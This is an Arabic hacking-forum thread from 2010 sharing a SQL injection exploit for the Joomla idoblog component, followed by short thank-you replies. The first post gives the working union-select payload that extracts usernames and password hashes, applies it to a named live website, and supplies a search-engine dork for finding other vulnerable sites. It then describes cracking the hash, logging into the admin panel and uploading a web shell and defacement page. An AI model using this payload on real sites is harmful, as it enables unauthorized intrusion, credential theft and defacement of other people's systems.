التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-06-2010, 11:18 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Multi_Hacker
 

 

 
إحصائية العضو






Multi_Hacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Multi_Hacker is on a distinguished road

افتراضي نفسك بشل ادخل هنا (Joomla Component idoblog 1.1b30)


السلام عليكم ورحمة الله وبركاته


انا اليوم لقيتلكم ثغرة حلووة

تابعو معى نشوف الثغره + شرحها سريع

كود PHP:
#####################################################################################
####                    com_idoblog SQL Injection ALL VERSIONS                     ####
#####################################################################################
#                                                                                   #
# Descubierto por : KKR                                                             # 
# Somos: knet, kiko, ricota, servl                                                  # 
# Contacto: elricota[*A*T*]gmail[*D*O*T]com                                         #                        
#####################################################################################
[+]    Ediciones anteriores tenian las mismas fallas pero no fixearon todo...
[+]    
Esta sql injection afecta todas las versiones
[-]
[+] 
exploit
[-] /
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=<usuario existente>+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
[+]
[-]    
Ejemplo:
[+]    
http://www.rayservpc.co.uk/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--
[-]
[+] 
d0rkinurl:"com_idoblog"
[-] http://www.diosdelared.com // http://www.remoteexecution.net/foro/
[-----------------------------------------------------------------------------------]
 
note:
<
name>idoblog</name>
<
creationDate>17 07 2008</creationDate>
<
author>Sunshine studio</author>
<
authorEmail>kotofeus@mail.ru</authorEmail>
<
authorUrl>http://sunshinestudio.ru</authorUrl>
<copyright>Sunshine studio</copyright>
<
license>Creative Commons v3.0</license>
<
version>v 1.1 (build 30)</version>
<
description>Blogs-system for Joomla 1.5</description
المصدر

http://www.milw0rm.com/exploits/9413


حلو ننسخ الدورك في google


بيطلع مواقع كتيره ~


نفتح أى موقع وننسخ الإستغلال ونحط الإستغلال بعد رآبط الموقع ~

كود PHP:
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- 
احيانا بيكون اليوزر admin بيكون مكتوب

هادا طلع مثلا اليوزر

argonaught


والباس مشفرر فك التشفير وروح على لوحة التحكم مسارها على نسبة 90% من الثغره

administrator
وقليل راح تلاقيها admin او مغيره

روحو ع اللوحة وارفوع اندكس وشل

ومبرووك عليكم

تحياتي



kts; fag h]og ikh (Joomla Component idoblog 1>1b30)

التوقيع




للمراسلة

علمني,اخترقلي = بلوك+ديليت

Moory30[at]Hotmail[dot]com
Skype: OMARATIONz


 


التعديل الأخير تم بواسطة Multi_Hacker ; 05-06-2010 الساعة 11:21 PM.

   

رد مع اقتباس
قديم 05-06-2010, 11:44 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية kalash2r
 

 

 
إحصائية العضو








kalash2r غير متواجد حالياً

إرسال رسالة عبر MSN إلى kalash2r إرسال رسالة عبر Skype إلى kalash2r

 

 

إحصائية الترشيح

عدد النقاط : 10
kalash2r is on a distinguished road

افتراضي


مشكورر يا أخي

   

رد مع اقتباس
قديم 05-07-2010, 01:21 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
D-GhosT s3cur!Ty-Z
::. Moderators .::
 
الصورة الرمزية D-GhosT s3cur!Ty-Z
 

 

 
إحصائية العضو







D-GhosT s3cur!Ty-Z غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
D-GhosT s3cur!Ty-Z is on a distinguished road

افتراضي


مشكوووووورخيوو مبدع كاعادة

التوقيع

Palastine 4ever



يرجى من الاخوة الكرام الاطلاع على قوانين الشبكة
لكي تكون لك مشاركة رائعة مع الشبكة


http://www.vbspiders.com/vb/t71973.html

 

   

رد مع اقتباس
قديم 05-07-2010, 06:31 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية Multi_Hacker
 

 

 
إحصائية العضو






Multi_Hacker غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Multi_Hacker is on a distinguished road

افتراضي


العفوو اخواني
حطمتوني بردودكم القصيرة هاي بس الله يعينا

تحياتي

التوقيع




للمراسلة

علمني,اخترقلي = بلوك+ديليت

Moory30[at]Hotmail[dot]com
Skype: OMARATIONz


 

   

رد مع اقتباس
قديم 05-18-2011, 06:49 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو





مختار الحاره غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مختار الحاره is on a distinguished road

افتراضي


يالغلا ... مشكله يطلع لي كذاا


Not Acceptable

   

رد مع اقتباس
قديم 05-18-2011, 10:12 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي


تغرة جميلة

   

رد مع اقتباس
قديم 05-21-2011, 08:00 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

افتراضي


يسلمو اخوي

بــصراحه الثغره جميله جدا

وهذي الثغره ممتازه

ولك مني اجمل تحيات

تقبل مروري

التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس
قديم 05-21-2011, 10:53 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي


مشكووور على الشرح الحلو

   

رد مع اقتباس
قديم 05-22-2011, 03:05 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية Barhom Basri
 

 

 
إحصائية العضو






Barhom Basri غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Barhom Basri is on a distinguished road

افتراضي


الميل ورم منتهي

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
Joomla Component com_camp SQL Injection Vulnerability Dr.NaNo قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 4 05-17-2010 06:46 PM
Joomla Component MS Comment LFI Vulnerability Dr.NaNo قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 2 05-17-2010 05:46 PM
ثغرة في سكربت Joomla Component com_ircmbasic MATRIX ALGERIA قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 4 04-07-2010 11:22 AM
شرح ثغرة Joomla Component younes قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 2 05-17-2009 04:06 PM


الساعة الآن 02:56 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0